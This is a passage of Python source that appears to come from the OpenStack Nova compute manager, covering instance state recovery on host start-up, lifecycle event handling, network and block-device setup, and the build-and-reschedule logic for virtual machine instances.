LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance.task_state, instance=instance)
try:
self._post_interrupted_snapshot_cleanup(context, instance)
except Exception:
                # we don't want an exception to block the init_host
LOG.exception('Failed to cleanup snapshot.', instance=instance)
instance.task_state = None
instance.save()
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.RESIZE_PREP]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
                      instance.task_state, instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.DELETING:
try:
LOG.info('Service started deleting the instance during '
'the previous run, but did not finish. Restarting'
' the deletion now.', instance=instance)
instance.obj_load_attr('metadata')
instance.obj_load_attr('system_metadata')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._delete_instance(context, instance, bdms)
except Exception:
                # we don't want an exception to block the init_host
LOG.exception('Failed to complete a deletion',
instance=instance)
self._set_instance_obj_error_state(context, instance)
return
current_power_state = self._get_power_state(context, instance)
try_reboot, reboot_type = self._retry_reboot(context, instance,
current_power_state)
if try_reboot:
LOG.debug("Instance in transitional state (%(task_state)s) at "
"start-up and power state is (%(power_state)s), "
"triggering reboot",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
# NOTE(mikal): if the instance was doing a soft reboot that got as
# far as shutting down the instance but not as far as starting it
# again, then we've just become a hard reboot. That means the
# task state for the instance needs to change so that we're in one
# of the expected task states for a hard reboot.
if (instance.task_state in task_states.soft_reboot_states and
reboot_type == 'HARD'):
instance.task_state = task_states.REBOOT_PENDING_HARD
instance.save()
self.reboot_instance(context, instance, block_device_info=None,
reboot_type=reboot_type)
return
elif (current_power_state == power_state.RUNNING and
instance.task_state in [task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD,
task_states.PAUSING,
task_states.UNPAUSING]):
LOG.warning("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ACTIVE
instance.save()
elif (current_power_state == power_state.PAUSED and
instance.task_state == task_states.UNPAUSING):
LOG.warning("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state "
"and unpausing the instance",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
try:
self.unpause_instance(context, instance)
except NotImplementedError:
                # Some virt drivers don't support pause and unpause
pass
except Exception:
LOG.exception('Failed to unpause instance', instance=instance)
return
if instance.task_state == task_states.POWERING_OFF:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying stop request",
instance.task_state, instance=instance)
self.stop_instance(context, instance, True)
except Exception:
                # we don't want an exception to block the init_host
LOG.exception('Failed to stop instance', instance=instance)
return
if instance.task_state == task_states.POWERING_ON:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying start request",
instance.task_state, instance=instance)
self.start_instance(context, instance)
except Exception:
                # we don't want an exception to block the init_host
LOG.exception('Failed to start instance', instance=instance)
return
net_info = instance.get_network_info()
try:
self.driver.plug_vifs(instance, net_info)
except NotImplementedError as e:
LOG.debug(e, instance=instance)
except exception.VirtualInterfacePlugException:
# we don't want an exception to block the init_host
LOG.exception("Vifs plug failed", instance=instance)
self._set_instance_obj_error_state(context, instance)
return
if instance.task_state == task_states.RESIZE_MIGRATING:
# We crashed during resize/migration, so roll back for safety
try:
# NOTE(mriedem): check old_vm_state for STOPPED here, if it's
# not in system_metadata we default to True for backwards
# compatibility
power_on = (instance.system_metadata.get('old_vm_state') !=
vm_states.STOPPED)
block_dev_info = self._get_instance_block_device_info(context,
instance)
self.driver.finish_revert_migration(context,
instance, net_info, block_dev_info, power_on)
except Exception:
LOG.exception('Failed to revert crashed migration',
instance=instance)
finally:
LOG.info('Instance found in migrating state during '
'startup. Resetting task_state',
instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.MIGRATING:
# Live migration did not complete, but instance is on this
# host, so reset the state.
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
db_state = instance.power_state
drv_state = self._get_power_state(context, instance)
expect_running = (db_state == power_state.RUNNING and
drv_state != db_state)
LOG.debug('Current state is %(drv_state)s, state in DB is '
'%(db_state)s.',
{'drv_state': drv_state, 'db_state': db_state},
instance=instance)
if expect_running and CONF.resume_guests_state_on_host_boot:
self._resume_guests_state(context, instance, net_info)
elif drv_state == power_state.RUNNING:
# VMwareAPI drivers will raise an exception
try:
self.driver.ensure_filtering_rules_for_instance(
instance, net_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'firewall rules', instance=instance)
def _resume_guests_state(self, context, instance, net_info):
LOG.info('Rebooting instance after nova-compute restart.',
instance=instance)
block_device_info = \
self._get_instance_block_device_info(context, instance)
try:
self.driver.resume_state_on_host_boot(
context, instance, net_info, block_device_info)
except NotImplementedError:
LOG.warning('Hypervisor driver does not support '
'resume guests', instance=instance)
except Exception:
# NOTE(vish): The instance failed to resume, so we set the
# instance to error and attempt to continue.
LOG.warning('Failed to resume instance',
instance=instance)
self._set_instance_obj_error_state(context, instance)
def _retry_reboot(self, context, instance, current_power_state):
current_task_state = instance.task_state
retry_reboot = False
reboot_type = compute_utils.get_reboot_type(current_task_state,
current_power_state)
pending_soft = (current_task_state == task_states.REBOOT_PENDING and
instance.vm_state in vm_states.ALLOW_SOFT_REBOOT)
pending_hard = (current_task_state == task_states.REBOOT_PENDING_HARD
and instance.vm_state in vm_states.ALLOW_HARD_REBOOT)
started_not_running = (current_task_state in
[task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD] and
current_power_state != power_state.RUNNING)
if pending_soft or pending_hard or started_not_running:
retry_reboot = True
return retry_reboot, reboot_type
def handle_lifecycle_event(self, event):
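        """Map a virt driver lifecycle event to a power state and, if the
        hypervisor still reports that state, synchronize the instance.
        """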
LOG.info("VM %(state)s (Lifecycle Event)",
{'state': event.get_name()},
instance_uuid=event.get_instance_uuid())
context = nova.context.get_admin_context(read_deleted='yes')
instance = objects.Instance.get_by_uuid(context,
event.get_instance_uuid(),
expected_attrs=[])
vm_power_state = None
if event.get_transition() == virtevent.EVENT_LIFECYCLE_STOPPED:
vm_power_state = power_state.SHUTDOWN
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_STARTED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_PAUSED:
vm_power_state = power_state.PAUSED
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_RESUMED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_SUSPENDED:
vm_power_state = power_state.SUSPENDED
else:
LOG.warning("Unexpected power state %d", event.get_transition())
# Note(lpetrut): The event may be delayed, thus not reflecting
# the current instance power state. In that case, ignore the event.
current_power_state = self._get_power_state(context, instance)
if current_power_state == vm_power_state:
LOG.debug('Synchronizing instance power state after lifecycle '
'event "%(event)s"; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, VM power_state: '
'%(vm_power_state)s',
{'event': event.get_name(),
'vm_state': instance.vm_state,
'task_state': instance.task_state,
'db_power_state': instance.power_state,
'vm_power_state': vm_power_state},
instance_uuid=instance.uuid)
self._sync_instance_power_state(context,
instance,
vm_power_state)
def handle_events(self, event):
if isinstance(event, virtevent.LifecycleEvent):
try:
self.handle_lifecycle_event(event)
except exception.InstanceNotFound:
LOG.debug("Event %s arrived for non-existent instance. The "
"instance was probably deleted.", event)
else:
LOG.debug("Ignoring event %s", event)
def init_virt_events(self):
if CONF.workarounds.handle_virt_lifecycle_events:
self.driver.register_event_listener(self.handle_events)
else:
# NOTE(mriedem): If the _sync_power_states periodic task is
# disabled we should emit a warning in the logs.
if CONF.sync_power_state_interval < 0:
LOG.warning('Instance lifecycle events from the compute '
'driver have been disabled. Note that lifecycle '
'changes to an instance outside of the compute '
'service will not be synchronized '
'automatically since the _sync_power_states '
'periodic task is also disabled.')
else:
LOG.info('Instance lifecycle events from the compute '
'driver have been disabled. Note that lifecycle '
'changes to an instance outside of the compute '
'service will only be synchronized by the '
'_sync_power_states periodic task.')
def init_host(self):
"""Initialization for a standalone compute service."""
if CONF.pci.passthrough_whitelist:
# Simply loading the PCI passthrough whitelist will do a bunch of
# validation that would otherwise wait until the PciDevTracker is
# constructed when updating available resources for the compute
# node(s) in the resource tracker, effectively killing that task.
# So load up the whitelist when starting the compute service to
# flush any invalid configuration early so we can kill the service
# if the configuration is wrong.
whitelist.Whitelist(CONF.pci.passthrough_whitelist)
# NOTE(sbauza): We want the compute node to hard fail if it won't be
# able to provide its resources to the placement API, or it will not
# be able to be eligible as a destination.
if CONF.placement.region_name is None:
raise exception.PlacementNotConfigured()
self.driver.init_host(host=self.host)
context = nova.context.get_admin_context()
instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=['info_cache', 'metadata'])
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_on()
self.init_virt_events()
try:
# checking that instance was not already evacuated to other host
self._destroy_evacuated_instances(context)
for instance in instances:
self._init_instance(context, instance)
finally:
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_off()
if instances:
# We only send the instance info to the scheduler on startup
# if there is anything to send, otherwise this host might
# not be mapped yet in a cell and the scheduler may have
# issues dealing with the information. Later changes to
# instances on this host will update the scheduler, or the
# _sync_scheduler_instance_info periodic task will.
self._update_scheduler_instance_info(context, instances)
def cleanup_host(self):
if self.instance_running_pool.running() > 0:
self.instance_running_pool.waitall()
self.driver.register_event_listener(None)
self.instance_events.cancel_all_events()
self.driver.cleanup_host(host=self.host)
def pre_start_hook(self):
"""After the service is initialized, but before we fully bring
the service up by listening on RPC queues, make sure to update
our available resources (and indirectly our available nodes).
"""
self.update_available_resource(nova.context.get_admin_context(),
startup=True)
def _get_power_state(self, context, instance):
"""Retrieve the power state for the given instance."""
LOG.debug('Checking state', instance=instance)
try:
return self.driver.get_info(instance).state
except exception.InstanceNotFound:
return power_state.NOSTATE
def get_console_topic(self, context):
"""Retrieves the console host for a project on this host.
Currently this is just set in the flags for each compute host.
"""
# TODO(mdragon): perhaps make this variable by console_type?
return '%s.%s' % (console_rpcapi.RPC_TOPIC, CONF.console_host)
@wrap_exception()
def get_console_pool_info(self, context, console_type):
return self.driver.get_console_pool_info(console_type)
@wrap_exception()
def refresh_instance_security_rules(self, context, instance):
"""Tell the virtualization driver to refresh security rules for
an instance.
Passes straight through to the virtualization driver.
Synchronize the call because we may still be in the middle of
creating the instance.
"""
@utils.synchronized(instance.uuid)
def _sync_refresh():
try:
return self.driver.refresh_instance_security_rules(instance)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'security groups.', instance=instance)
return _sync_refresh()
def _await_block_device_map_created(self, context, vol_id):
# TODO(yamahata): creating volume simultaneously
# reduces creation time?
# TODO(yamahata): eliminate dumb polling
start = time.time()
retries = CONF.block_device_allocate_retries
if retries < 0:
LOG.warning("Treating negative config value (%(retries)s) for "
"'block_device_retries' as 0.",
{'retries': retries})
# (1) treat negative config value as 0
# (2) the configured value is 0, one attempt should be made
# (3) the configured value is > 0, then the total number attempts
# is (retries + 1)
attempts = 1
if retries >= 1:
attempts = retries + 1
for attempt in range(1, attempts + 1):
volume = self.volume_api.get(context, vol_id)
volume_status = volume['status']
if volume_status not in ['creating', 'downloading']:
if volume_status == 'available':
return attempt
LOG.warning("Volume id: %(vol_id)s finished being "
"created but its status is %(vol_status)s.",
{'vol_id': vol_id,
'vol_status': volume_status})
break
greenthread.sleep(CONF.block_device_allocate_retries_interval)
raise exception.VolumeNotCreated(volume_id=vol_id,
seconds=int(time.time() - start),
attempts=attempt,
volume_status=volume_status)
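    # For example, block_device_allocate_retries=3 gives 4 polling attempts in
    # the loop above, spaced block_device_allocate_retries_interval seconds
    # apart; 0 or a negative value results in a single attempt.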
def _decode_files(self, injected_files):
"""Base64 decode the list of files to inject."""
if not injected_files:
return []
def _decode(f):
path, contents = f
# Py3 raises binascii.Error instead of TypeError as in Py27
try:
decoded = base64.b64decode(contents)
return path, decoded
except (TypeError, binascii.Error):
raise exception.Base64Exception(path=path)
return [_decode(f) for f in injected_files]
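    # For reference, injected_files arrive as (path, base64_contents) pairs;
    # e.g. ('/etc/motd', 'aGVsbG8=') decodes to ('/etc/motd', b'hello').
    # The values shown are illustrative only.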
def _validate_instance_group_policy(self, context, instance,
scheduler_hints):
# NOTE(russellb) Instance group policy is enforced by the scheduler.
# However, there is a race condition with the enforcement of
# the policy. Since more than one instance may be scheduled at the
# same time, it's possible that more than one instance with an
# anti-affinity policy may end up here. It's also possible that
# multiple instances with an affinity policy could end up on different
# hosts. This is a validation step to make sure that starting the
# instance here doesn't violate the policy.
group_hint = scheduler_hints.get('group')
if not group_hint:
return
# The RequestSpec stores scheduler_hints as key=list pairs so we need
# to check the type on the value and pull the single entry out. The
# API request schema validates that the 'group' hint is a single value.
if isinstance(group_hint, list):
group_hint = group_hint[0]
@utils.synchronized(group_hint)
def _do_validation(context, instance, group_hint):
group = objects.InstanceGroup.get_by_hint(context, group_hint)
if 'anti-affinity' in group.policies:
group_hosts = group.get_hosts(exclude=[instance.uuid])
resource_scheduling = self.driver.capabilities.get(
"resource_scheduling", False)
if self.host in group_hosts and not resource_scheduling:
msg = _("Anti-affinity instance group policy "
"was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
elif 'affinity' in group.policies:
group_hosts = group.get_hosts(exclude=[instance.uuid])
if group_hosts and self.host not in group_hosts:
msg = _("Affinity instance group policy was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
if not CONF.workarounds.disable_group_policy_check_upcall:
_do_validation(context, instance, group_hint)
def _log_original_error(self, exc_info, instance_uuid):
LOG.error('Error: %s', exc_info[1], instance_uuid=instance_uuid,
exc_info=exc_info)
def _reschedule(self, context, request_spec, filter_properties,
instance, reschedule_method, method_args, task_state,
exc_info=None, host_list=None):
"""Attempt to re-schedule a compute operation."""
instance_uuid = instance.uuid
retry = filter_properties.get('retry')
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance_uuid=instance_uuid)
return
if not request_spec:
LOG.debug("No request spec, will not reschedule",
instance_uuid=instance_uuid)
return
LOG.debug("Re-scheduling %(method)s: attempt %(num)d",
{'method': reschedule_method.__name__,
'num': retry['num_attempts']}, instance_uuid=instance_uuid)
# reset the task state:
self._instance_update(context, instance, task_state=task_state)
if exc_info:
# stringify to avoid circular ref problem in json serialization:
retry['exc'] = traceback.format_exception_only(exc_info[0],
exc_info[1])
reschedule_method(context, *method_args, host_list=host_list)
return True
@periodic_task.periodic_task
def _check_instance_build_time(self, context):
"""Ensure that instances are not stuck in build."""
timeout = CONF.instance_build_timeout
if timeout == 0:
return
filters = {'vm_state': vm_states.BUILDING,
'host': self.host}
building_insts = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
for instance in building_insts:
if timeutils.is_older_than(instance.created_at, timeout):
self._set_instance_obj_error_state(context, instance)
LOG.warning("Instance build timed out. Set to error "
"state.", instance=instance)
def _check_instance_exists(self, context, instance):
"""Ensure an instance with the same name is not already present."""
if self.driver.instance_exists(instance):
raise exception.InstanceExists(name=instance.name)
def _allocate_network_async(self, context, instance, requested_networks,
macs, security_groups, is_vpn):
"""Method used to allocate networks in the background.
Broken out for testing.
"""
# First check to see if we're specifically not supposed to allocate
# networks because if so, we can exit early.
if requested_networks and requested_networks.no_allocate:
LOG.debug("Not allocating networking since 'none' was specified.",
instance=instance)
return network_model.NetworkInfo([])
LOG.debug("Allocating IP information in the background.",
instance=instance)
retries = CONF.network_allocate_retries
attempts = retries + 1
retry_time = 1
bind_host_id = self.driver.network_binding_host_id(context, instance)
for attempt in range(1, attempts + 1):
try:
nwinfo = self.network_api.allocate_for_instance(
context, instance, vpn=is_vpn,
requested_networks=requested_networks,
macs=macs,
security_groups=security_groups,
bind_host_id=bind_host_id)
LOG.debug('Instance network_info: |%s|', nwinfo,
instance=instance)
instance.system_metadata['network_allocated'] = 'True'
# NOTE(JoshNang) do not save the instance here, as it can cause
# races. The caller shares a reference to instance and waits
# for this async greenthread to finish before calling
# instance.save().
return nwinfo
except Exception:
exc_info = sys.exc_info()
log_info = {'attempt': attempt,
'attempts': attempts}
if attempt == attempts:
LOG.exception('Instance failed network setup '
'after %(attempts)d attempt(s)',
log_info)
six.reraise(*exc_info)
LOG.warning('Instance failed network setup '
'(attempt %(attempt)d of %(attempts)d)',
log_info, instance=instance)
time.sleep(retry_time)
retry_time *= 2
if retry_time > 30:
retry_time = 30
# Not reached.
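    # The retry loop above backs off exponentially between attempts: roughly
    # 1, 2, 4, 8, 16 and then 30 seconds, capped at 30 seconds.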
def _build_networks_for_instance(self, context, instance,
requested_networks, security_groups):
# If we're here from a reschedule the network may already be allocated.
if strutils.bool_from_string(
instance.system_metadata.get('network_allocated', 'False')):
            # NOTE(alex_xu): network_allocated being True means the network
            # resources were already allocated during a previous scheduling
            # attempt and the network setup was cleaned up afterwards. After
            # rescheduling, the network resources need to be set up again on
            # the new host.
self.network_api.setup_instance_network_on_host(
context, instance, instance.host)
return self.network_api.get_instance_nw_info(context, instance)
if not self.is_neutron_security_groups:
security_groups = []
macs = self.driver.macs_for_instance(instance)
network_info = self._allocate_network(context, instance,
requested_networks, macs, security_groups)
return network_info
def _allocate_network(self, context, instance, requested_networks, macs,
security_groups):
"""Start network allocation asynchronously. Return an instance
of NetworkInfoAsyncWrapper that can be used to retrieve the
allocated networks when the operation has finished.
"""
# NOTE(comstud): Since we're allocating networks asynchronously,
# this task state has little meaning, as we won't be in this
# state for very long.
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.NETWORKING
instance.save(expected_task_state=[None])
is_vpn = False
return network_model.NetworkInfoAsyncWrapper(
self._allocate_network_async, context, instance,
requested_networks, macs, security_groups, is_vpn)
def _default_root_device_name(self, instance, image_meta, root_bdm):
try:
return self.driver.default_root_device_name(instance,
image_meta,
root_bdm)
except NotImplementedError:
return compute_utils.get_next_device_name(instance, [])
def _default_device_names_for_instance(self, instance,
root_device_name,
*block_device_lists):
try:
self.driver.default_device_names_for_instance(instance,
root_device_name,
*block_device_lists)
except NotImplementedError:
compute_utils.default_device_names_for_instance(
instance, root_device_name, *block_device_lists)
def _get_device_name_for_instance(self, instance, bdms, block_device_obj):
# NOTE(ndipanov): Copy obj to avoid changing the original
block_device_obj = block_device_obj.obj_clone()
try:
return self.driver.get_device_name_for_instance(
instance, bdms, block_device_obj)
except NotImplementedError:
return compute_utils.get_device_name_for_instance(
instance, bdms, block_device_obj.get("device_name"))
def _default_block_device_names(self, instance, image_meta, block_devices):
"""Verify that all the devices have the device_name set. If not,
provide a default name.
        It also ensures that there is a root_device_name and that it is set
        to the first block device in the boot sequence (boot_index=0).
"""
root_bdm = block_device.get_root_bdm(block_devices)
if not root_bdm:
return
# Get the root_device_name from the root BDM or the instance
root_device_name = None
update_root_bdm = False
if root_bdm.device_name:
root_device_name = root_bdm.device_name
instance.root_device_name = root_device_name
elif instance.root_device_name:
root_device_name = instance.root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
else:
root_device_name = self._default_root_device_name(instance,
image_meta,
root_bdm)
instance.root_device_name = root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
if update_root_bdm:
root_bdm.save()
ephemerals = list(filter(block_device.new_format_is_ephemeral,
block_devices))
swap = list(filter(block_device.new_format_is_swap,
block_devices))
block_device_mapping = list(filter(
driver_block_device.is_block_device_mapping, block_devices))
self._default_device_names_for_instance(instance,
root_device_name,
ephemerals,
swap,
block_device_mapping)
def _block_device_info_to_legacy(self, block_device_info):
"""Convert BDI to the old format for drivers that need it."""
if self.use_legacy_block_device_info:
ephemerals = driver_block_device.legacy_block_devices(
driver.block_device_info_get_ephemerals(block_device_info))
mapping = driver_block_device.legacy_block_devices(
driver.block_device_info_get_mapping(block_device_info))
swap = block_device_info['swap']
if swap:
swap = swap.legacy()
block_device_info.update({
'ephemerals': ephemerals,
'swap': swap,
'block_device_mapping': mapping})
def _add_missing_dev_names(self, bdms, instance):
for bdm in bdms:
if bdm.device_name is not None:
continue
device_name = self._get_device_name_for_instance(instance,
bdms, bdm)
values = {'device_name': device_name}
bdm.update(values)
bdm.save()
def _prep_block_device(self, context, instance, bdms):
"""Set up the block device for an instance with error logging."""
try:
self._add_missing_dev_names(bdms, instance)
block_device_info = driver.get_block_device_info(instance, bdms)
mapping = driver.block_device_info_get_mapping(block_device_info)
driver_block_device.attach_block_devices(
mapping, context, instance, self.volume_api, self.driver,
wait_func=self._await_block_device_map_created)
self._block_device_info_to_legacy(block_device_info)
return block_device_info
except exception.OverQuota as e:
LOG.warning('Failed to create block device for instance due'
' to exceeding volume related resource quota.'
' Error: %s', e.message, instance=instance)
raise
except Exception as ex:
LOG.exception('Instance failed block device setup',
instance=instance)
# InvalidBDM will eventually result in a BuildAbortException when
# booting from volume, and will be recorded as an instance fault.
# Maintain the original exception message which most likely has
# useful details which the standard InvalidBDM error message lacks.
raise exception.InvalidBDM(six.text_type(ex))
def _update_instance_after_spawn(self, context, instance):
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.launched_at = timeutils.utcnow()
configdrive.update_instance(instance)
def _update_scheduler_instance_info(self, context, instance):
"""Sends an InstanceList with created or updated Instance objects to
the Scheduler client.
In the case of init_host, the value passed will already be an
InstanceList. Other calls will send individual Instance objects that
have been created or resized. In this case, we create an InstanceList
object containing that Instance.
"""
if not self.send_instance_updates:
return
if isinstance(instance, obj_instance.Instance):
instance = objects.InstanceList(objects=[instance])
context = context.elevated()
self.scheduler_client.update_instance_info(context, self.host,
instance)
def _delete_scheduler_instance_info(self, context, instance_uuid):
"""Sends the uuid of the deleted Instance to the Scheduler client."""
if not self.send_instance_updates:
return
context = context.elevated()
self.scheduler_client.delete_instance_info(context, self.host,
instance_uuid)
@periodic_task.periodic_task(spacing=CONF.scheduler_instance_sync_interval)
def _sync_scheduler_instance_info(self, context):
if not self.send_instance_updates:
return
context = context.elevated()
instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
uuids = [instance.uuid for instance in instances]
self.scheduler_client.sync_instance_info(context, self.host, uuids)
def _notify_about_instance_usage(self, context, instance, event_suffix,
network_info=None, system_metadata=None,
extra_usage_info=None, fault=None):
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, event_suffix,
network_info=network_info,
system_metadata=system_metadata,
extra_usage_info=extra_usage_info, fault=fault)
def _deallocate_network(self, context, instance,
requested_networks=None):
# If we were told not to allocate networks let's save ourselves
# the trouble of calling the network API.
if requested_networks and requested_networks.no_allocate:
LOG.debug("Skipping network deallocation for instance since "
"networking was not requested.", instance=instance)
return
LOG.debug('Deallocating network for instance', instance=instance)
with timeutils.StopWatch() as timer:
self.network_api.deallocate_for_instance(
context, instance, requested_networks=requested_networks)
# nova-network does an rpc call so we're OK tracking time spent here
LOG.info('Took %0.2f seconds to deallocate network for instance.',
timer.elapsed(), instance=instance)
def _get_instance_block_device_info(self, context, instance,
refresh_conn_info=False,
bdms=None):
"""Transform block devices to the driver block_device format."""
if not bdms:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = driver.get_block_device_info(instance, bdms)
if not refresh_conn_info:
# if the block_device_mapping has no value in connection_info
            # (returned as None), don't include it in the mapping
block_device_info['block_device_mapping'] = [
bdm for bdm in driver.block_device_info_get_mapping(
block_device_info)
if bdm.get('connection_info')]
else:
driver_block_device.refresh_conn_infos(
driver.block_device_info_get_mapping(block_device_info),
context, instance, self.volume_api, self.driver)
self._block_device_info_to_legacy(block_device_info)
return block_device_info
def _build_failed(self, node):
if CONF.compute.consecutive_build_service_disable_threshold:
rt = self._get_resource_tracker()
# NOTE(danms): Update our counter, but wait for the next
# update_available_resource() periodic to flush it to the DB
rt.build_failed(node)
def _build_succeeded(self, node):
rt = self._get_resource_tracker()
rt.build_succeeded(node)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def build_and_run_instance(self, context, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None, host_list=None):
@utils.synchronized(instance.uuid)
def _locked_do_build_and_run_instance(*args, **kwargs):
# NOTE(danms): We grab the semaphore with the instance uuid
# locked because we could wait in line to build this instance
# for a while and we want to make sure that nothing else tries
# to do anything with this instance while we wait.
with self._per_project_build_semaphore.get(instance.project_id):
with self._build_semaphore:
try:
result = self._do_build_and_run_instance(*args,
**kwargs)
except Exception:
# NOTE(mriedem): This should really only happen if
# _decode_files in _do_build_and_run_instance fails,
# and that's before a guest is spawned so it's OK to
# remove allocations for the instance for this node
# from Placement below as there is no guest consuming
# resources anyway. The _decode_files case could be
# handled more specifically but that's left for
# another day.
result = build_results.FAILED
raise
finally:
if result == build_results.FAILED:
# Remove the allocation records from Placement for
                        # the instance if the build failed. The instance.host
                        # is likely set to None in _do_build_and_run_instance,
# which means if the user deletes the instance, it
# will be deleted in the API, not the compute
# service. Setting the instance.host to None in
# _do_build_and_run_instance means that the
# ResourceTracker will no longer consider this
# instance to be claiming resources against it,
# so we want to reflect that same thing in
# Placement. No need to call this for a
# reschedule, as the allocations will have already
# been removed in
# self._do_build_and_run_instance().
self._delete_allocation_for_instance(context,
instance.uuid)
if result in (build_results.FAILED,
build_results.RESCHEDULED):
self._build_failed(node)
else:
self._build_succeeded(node)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
self.instance_running_pool.spawn_n(_locked_do_build_and_run_instance,
context, instance, image, request_spec,
filter_properties, admin_password, injected_files,
requested_networks, security_groups,
block_device_mapping, node, limits, host_list)
def _delete_allocation_for_instance(self, context, instance_uuid):
rt = self._get_resource_tracker()
rt.reportclient.delete_allocation_for_instance(context, instance_uuid)
def _check_device_tagging(self, requested_networks, block_device_mapping):
tagging_requested = False
if requested_networks:
for net in requested_networks:
if 'tag' in net and net.tag is not None:
tagging_requested = True
break
if block_device_mapping and not tagging_requested:
for bdm in block_device_mapping:
if 'tag' in bdm and bdm.tag is not None:
tagging_requested = True
break
if (tagging_requested and
not self.driver.capabilities.get('supports_device_tagging')):
raise exception.BuildAbortException('Attempt to boot guest with '
'tagged devices on host that '
'does not support tagging.')
@hooks.add_hook('build_instance')
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def _do_build_and_run_instance(self, context, instance, image,
request_spec, filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
node=None, limits=None, host_list=None):
try:
LOG.debug('Starting instance...', instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = None
instance.save(expected_task_state=
(task_states.SCHEDULING, None))
except exception.InstanceNotFound:
msg = 'Instance disappeared before build.'
LOG.debug(msg, instance=instance)
return build_results.FAILED
except exception.UnexpectedTaskStateError as e:
LOG.debug(e.format_message(), instance=instance)
return build_results.FAILED
# b64 decode the files to inject:
decoded_files = self._decode_files(injected_files)
if limits is None:
limits = {}
if node is None:
node = self._get_nodename(instance, refresh=True)
try:
with timeutils.StopWatch() as timer:
self._build_and_run_instance(context, instance, image,
decoded_files, admin_password, requested_networks,
security_groups, block_device_mapping, node, limits,
filter_properties, request_spec)
LOG.info('Took %0.2f seconds to build instance.',
timer.elapsed(), instance=instance)
return build_results.ACTIVE
except exception.RescheduledException as e:
retry = filter_properties.get('retry')
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context,
instance, e, sys.exc_info(),
fault_message=e.kwargs['reason'])
self._nil_out_instance_obj_host_and_node(instance)
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
return build_results.FAILED
LOG.debug(e.format_message(), instance=instance)
# This will be used for logging the exception
retry['exc'] = traceback.format_exception(*sys.exc_info())
# This will be used for setting the instance fault message
retry['exc_reason'] = e.kwargs['reason']
# NOTE(comstud): Deallocate networks if the driver wants
# us to do so.
# NOTE(mriedem): Always deallocate networking when using Neutron.
# This is to unbind any ports that the user supplied in the server
# create request, or delete any ports that nova created which were
# meant to be bound to this host. This check intentionally bypasses
# the result of deallocate_networks_on_reschedule because the
# default value in the driver is False, but that method was really
# only meant for Ironic and should be removed when nova-network is
# removed (since is_neutron() will then always be True).
# NOTE(vladikr): SR-IOV ports should be deallocated to
# allow new sriov pci devices to be allocated on a new host.
# Otherwise, if devices with pci addresses are already allocated
# on the destination host, the instance will fail to spawn.
# info_cache.network_info should be present at this stage.
if (self.driver.deallocate_networks_on_reschedule(instance) or
utils.is_neutron() or
self.deallocate_sriov_ports_on_reschedule(instance)):
self._cleanup_allocated_networks(context, instance,
requested_networks)
else:
                # NOTE(alex_xu): Networks are already allocated and we don't
                # want to deallocate them before rescheduling. But we need
                # to clean up the network resources set up on this host
                # before rescheduling.
self.network_api.cleanup_instance_network_on_host(
context, instance, self.host)
self._nil_out_instance_obj_host_and_node(instance)
instance.task_state = task_states.SCHEDULING
instance.save()
# The instance will have already claimed resources from this host
# before this build was attempted. Now that it has failed, we need
# to unclaim those resources before casting to the conductor, so
# that if there are alternate hosts available for a retry, it can
# claim resources on that new host for the instance.
self._delete_allocation_for_instance(context, instance.uuid)
self.compute_task_api.build_instances(context, [instance],
image, filter_properties, admin_password,
injected_files, requested_networks, security_groups,
block_device_mapping, request_spec=request_spec,
host_lists=[host_list])
